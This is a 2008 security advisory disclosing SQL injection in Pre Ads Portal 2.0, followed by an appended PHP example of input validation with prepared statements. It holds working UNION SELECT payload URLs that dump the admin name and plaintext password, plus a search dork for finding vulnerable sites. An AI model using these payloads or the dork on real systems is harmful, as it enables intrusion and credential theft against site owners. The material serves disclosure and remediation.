ECHO_ADV_98$2008

---------------------------------------------------------------------------
[ECHO_ADV_98$2008] Pre Ads Portal <= 2.0 SQL Injection Vulnerability
---------------------------------------------------------------------------

Author       : M.Hasran Addahroni
Date         : June, 13th 2008
Location     : Jakarta, Indonesia
Web          : http://e-rdc.org/v1/news.php?readmore=98
Critical Lvl : Medium
Impact       : System access
Where        : From Remote

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : Pre Ads Portal
Version     : <= 2.0
Vendor      : http://www.preproject.com/ads.asp
Description :

Pre ADS Portal is a Web Application which is used to submit your personal
listings into different categories. You can add your listings into the
following categories or can also add, edit and delete categories and
sub categories from the admin section. Pre ADS Portal is a fully customizable
website for ads submission with golden and featured listings features.

During submission users can make their ads golden or featured listed and
the webmaster can add packages for monthly payments against these features.
2Checkout and PAYPAL have been integrated into this portal system. We have tried
to make the script completely resemble Businessesforsale.com, hotscripts.com
and most advanced classifieds websites. Below are the main features or a
kind of manual of our Pre ADS Portal.
---------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~~~~~

Input passed to the "cid" parameter in showcategory.php and to the "id" parameter
in software-description.php is not properly verified before being used in an SQL query.
This can be exploited through the browser to retrieve the admin password in plain text.
Successful exploitation requires that "magic_quotes" is off.


Poc/Exploit:
~~~~~~~~~~~~

http://[URL]/[path]/showcategory.php?cid=-1%20union%20select%201,concat\
(id,0x3a,admin_name,0x3a,pwd),3,4,5,6%20from%20sbwmd_admin--

http://[URL]/[path]/software-description.php?id=-1%20union%20select%201,2,concat\
(id,0x3a,admin_name,0x3a,pwd),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1%20\
from%20sbwmd_admin--

Dork:
~~~~~
altavista : "home | login | register | feedback | link to us | submit Listing | advertise"


Solution:
~~~~~~~~~

- Edit the source code to ensure that input is properly verified.
- Turn on magic_quotes in php.ini


Timeline:
~~~~~~~~~

- 10 - 06 - 2008 bug found
- 13 - 06 - 2008 vendor contacted
- 13 - 06 - 2008 advisory released
---------------------------------------------------------------------------

Shoutz:
~~~~~~~
~ ping - my dearest wife, zautha my little warrior "happy birthday, dear"
~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,pushm0v,az001,negative,
  the_hydra,neng chika, str0ke
~ everybody [at] SCAN-NUSANTARA and SCAN-ASSOSIATES
~ masterpop3,maSter-oP,Lieur-Euy,Mr_ny3m,bithedz,murp,sakitjiwa,x16,an0maly,cybertank,
  super_temon, b120t0,inggar,fachri,adi,rahmat,indra,cyb3rh3b
~ dr188le,SinChan,h4ntu,cow_1seng,poniman_coy,paman_gembul,ketut,rizal,cR4SH3R,
  kuntua, stev_manado,nofry,k1tk4t,0pt1c
~ newbie_hacker@yahoogroups.com
~ #aikmel #e-c-h-o @irc.dal.net

---------------------------------------------------------------------------
Contact:
~~~~~~~~

K-159 || echo|staff || eufrato[at]gmail[dot]com
Homepage: http://www.e-rdc.org/

-------------------------------- [ EOF ] ----------------------------------
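
The first item under Solution, sketched as an added example (not Pre Ads Portal source and not code from the advisory's author): the numeric parameter is validated as a positive integer and then bound to a prepared statement, which does not depend on magic_quotes (removed in PHP 5.4). Assumptions: the listings table, its columns, and the helpers parse_id() and fetch_listings() are hypothetical; an in-memory SQLite database (pdo_sqlite) stands in for the application's database.

```php
<?php
declare(strict_types=1);

// Accept only a positive decimal integer; anything else yields null.
function parse_id($raw): ?int
{
    if (!is_string($raw)) {
        return null; // missing value, or array input such as cid[]=1
    }
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// The value is bound as an integer, never concatenated into the SQL text.
function fetch_listings(PDO $db, int $cid): array
{
    $stmt = $db->prepare('SELECT id, title FROM listings WHERE cid = :cid');
    $stmt->bindValue(':cid', $cid, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed demo data. Only the table name sbwmd_admin comes from the
// advisory; the listings schema and every row below are made up.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE listings (id INTEGER, cid INTEGER, title TEXT)');
$db->exec('CREATE TABLE sbwmd_admin (id INTEGER, admin_name TEXT, pwd TEXT)');
$db->exec("INSERT INTO listings VALUES (1, 7, 'Sample listing')");
$db->exec("INSERT INTO sbwmd_admin VALUES (1, 'admin', 'constructed-value')");

// Constructed request values: a valid id, a non-numeric value of the kind
// the advisory describes, an array, and a missing parameter.
$inputs = ['7', '-1 union select 1', ['7'], null];
foreach ($inputs as $raw) {
    $cid = parse_id($raw);
    if ($cid === null) {
        echo "rejected: the page would answer HTTP 400 and run no query\n";
        continue;
    }
    echo json_encode(fetch_listings($db, $cid)), "\n";
}
```

The same pattern applies to the "id" parameter of software-description.php. Because the advisory notes the admin password is readable in plain text, storing pwd as a password_hash() digest would limit what any future leak exposes.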